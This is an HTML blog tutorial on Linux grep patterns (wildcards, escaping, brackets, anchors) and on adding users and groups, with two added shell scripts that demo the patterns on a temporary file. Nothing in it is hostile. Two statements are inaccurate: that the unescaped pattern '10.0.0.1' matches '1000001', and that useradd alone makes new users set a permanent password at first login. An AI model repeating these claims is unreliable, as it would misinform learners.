<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">What is grep used for?</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - Searching.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">syntax:<span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep xyz file</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep searches for the pattern ‘xyz’ in ‘file’ and prints the lines in which that pattern is present.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You can pass the output of any command to grep by piping it. </span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ls | grep hack</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This command lists all the files in the current directory whose names contain the string “hack”.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" />The ultimate power of grep is understood when used with wild-cards & regular expressions.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Wild-card </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (dot)</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">“.” matches exactly 1 character </span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for example:</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$cat file</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">foo</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">too</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">look</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$grep ‘.oo’ file</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">foo</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">too</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">look</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To search for strings containing a literal “.”, we escape it with the ‘\’ escape character.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">e.g. To search for “google.com” </span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$grep ‘google\.com’ file</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Repetition *</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$grep ‘lo*k’ file</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">look</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A character followed by * matches zero or more occurrences of that character.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: italic; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">“.*” therefore matches any string, as expected</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
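The wildcard, escape and repetition rules above are best seen side by side on one input. The script below is an added example, not code from the original post: it writes a small constructed file (using example.com rather than google.com as the host name so that the “oo” in “google” does not also match the ‘.oo’ pattern) and runs each pattern as a shell function, including the pitfall the escape rule prevents, an unescaped dot silently matching “exampleXcom”. The ‘^’ anchor at the end is the same one the regexp table below this section describes.

```shell
#!/bin/sh
# Added example (not from the original post): the section's grep patterns
# run against a constructed sample file.

# Create the sample file and print its path. Contents are constructed.
make_sample() {
    f=$(mktemp)
    printf '%s\n' foo too look lok lk example.com exampleXcom mail.example.com > "$f"
    echo "$f"
}

# Wildcard: any single character followed by "oo". $1: file path
dot_oo() { grep '.oo' "$1"; }

# Unescaped dot: "." is a wildcard, so "exampleXcom" matches as well.
host_unescaped() { grep 'example.com' "$1"; }

# Escaped dot: only a literal "." between "example" and "com" matches.
host_escaped() { grep 'example\.com' "$1"; }

# Repetition: "o*" is zero or more "o", so "lk" and "lok" match, not just "look".
l_ostar_k() { grep 'lo*k' "$1"; }

# Anchor: "^" pins the match to the start of the line, excluding "mail.example.com".
host_anchored() { grep '^example\.com' "$1"; }

# Usage: run every pattern and show what each one selects.
f=$(make_sample)
for fn in dot_oo host_unescaped host_escaped l_ostar_k host_anchored; do
    echo "== $fn"
    "$fn" "$f"
done
rm -f "$f"
```

The unescaped/escaped pair is the one to remember when grepping logs for a host name or IP address: ‘10.0.0.1’ without escaping also matches ‘10x0y0z1’ and ‘1000001’, which quietly inflates the hit count.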
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Regular expressions</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The table below shows the use of regular expressions in grep, with examples.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr"><table style="border-bottom-style: none; border-collapse: collapse; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; width: 624px;"><colgroup><col width="*"></col><col width="*"></col><col width="*"></col><col width="*"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Regexp</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Description</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; 
font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Use</span></td><td style="background-color: white; border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches</span></td></tr>
<tr style="height: 0px;"><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[ ]</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches a selection of characters. Range of characters can also be provided.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In short, [ ] stands for exactly one of the characters listed within the brackets.</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep “[Gg]oogle” file</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep “[a-c]d” file</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">google,Google</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ad,bd,cd</span></td></tr>
<tr style="height: 0px;"><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">^</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Inside brackets, ^ negates the set: [^a] matches any single character except a. </span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Outside brackets, ^ anchors the match to the beginning of a line.</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep '[^a]d' file</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep '^[ ]*hello' file</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">bd,cd,... but not ad</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches lines that begin with hello, allowing leading spaces:</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hello world</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> hello</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This will not be matched: hi hello</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></td></tr>
<tr style="height: 0px;"><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches the end of the line</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">grep 'hello$' file</span></td><td style="border-bottom-color: rgb(170, 170, 170); border-bottom-style: dotted; border-bottom-width: 1px; border-left-color: rgb(170, 170, 170); border-left-style: dotted; border-left-width: 1px; border-right-color: rgb(170, 170, 170); border-right-style: dotted; border-right-width: 1px; border-top-color: rgb(170, 170, 170); border-top-style: dotted; border-top-width: 1px; padding-bottom: 7px; padding-left: 7px; padding-right: 7px; padding-top: 7px; vertical-align: top;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Matches lines with hello at the end.</span></td></tr>
</tbody></table></div><br />
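As an added example (not part of the original post), this script builds a small constructed sample file and runs the bracket, ^ and $ patterns from the table above with every pattern quoted, then shows what happens when ^[ ]*hello is left unquoted and the shell splits it. SAMPLE_FILE, count_matches, show_matches and unquoted_status are this example's own names.

```shell
#!/bin/sh
# Added example, not from the original post: runs the bracket, ^ and $
# patterns from the table above against a small constructed sample file,
# with every pattern quoted so the shell does not mangle it.
set -u

# Constructed sample input (not real data).
SAMPLE_FILE="${TMPDIR:-/tmp}/grep_intro_sample.$$"
printf '%s\n' \
    'google is a search engine' \
    'Google Chrome' \
    'ad' 'bd' 'cd' 'xd' \
    'hello world' \
    '   hello' \
    'hi hello' \
    'say hello' > "$SAMPLE_FILE"

cleanup() {
    rm -f "$SAMPLE_FILE"
}
trap cleanup EXIT

# count_matches PATTERN: print how many sample lines match PATTERN.
# grep -c exits 1 when the count is 0; treat that as a normal result.
count_matches() {
    grep -c -- "$1" "$SAMPLE_FILE" || [ $? -eq 1 ]
}

# show_matches PATTERN: print the matching lines with a label.
show_matches() {
    printf '\n%-16s -> %s line(s)\n' "$1" "$(count_matches "$1")"
    grep -n -- "$1" "$SAMPLE_FILE" || true
}

# unquoted_status: the pitfall behind 'grep ^[ ]*hello'. Left unquoted,
# the shell splits the pattern on the space, so grep receives '^[' as its
# regex (an unterminated bracket expression) plus a literal ']*hello' as a
# file name, and fails instead of searching.
unquoted_status() {
    status=0
    grep ^[ ]*hello "$SAMPLE_FILE" >/dev/null 2>&1 || status=$?
    echo "$status"
}

demo() {
    show_matches '[Gg]oogle'       # google, Google
    show_matches '[a-c]d'          # ad, bd, cd
    show_matches '[^a]d'           # bd, cd, xd ... and "hello world" via "ld"
    show_matches '^[ ]*hello'      # hello at line start, leading spaces allowed
    show_matches 'hello$'          # hello at line end
    show_matches '^[ ]*hello[ ]*$' # a line that is only hello (plus spaces)
    printf '\nunquoted grep ^[ ]*hello exit status: %s\n' "$(unquoted_status)"
}

demo
```

Note that '[^a]d' also hits "hello world" through the "ld" in "world": a negated set still matches any other character, so anchor or narrow the pattern when that matters.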
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is it for grep in this intro, but there is a lot more that can be done with regular expressions. Refer to the grep man page for the rest!</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Managing users and groups</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To add a new user to the system:</span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$useradd bob</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When a user is added without specifying a group, Linux automatically creates a new group with the same name as the user just added and makes it that user's primary group.</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: #000099; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$useradd -g admins alice</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This will add the user alice with admins as her primary group; the admins group must already exist.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When each new user first logs in, they are prompted for their new permanent password.</span><span style="background-color: white; color: black; font-family: Arial; font-size: 10pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 10pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 10pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To add a new group to the system:</span><br />
<span style="background-color: white; color: #cc0000; font-family: 'Courier New'; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$groupadd developers</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This will add a group with name developers.</span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: white; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Changing a password:</span><br />
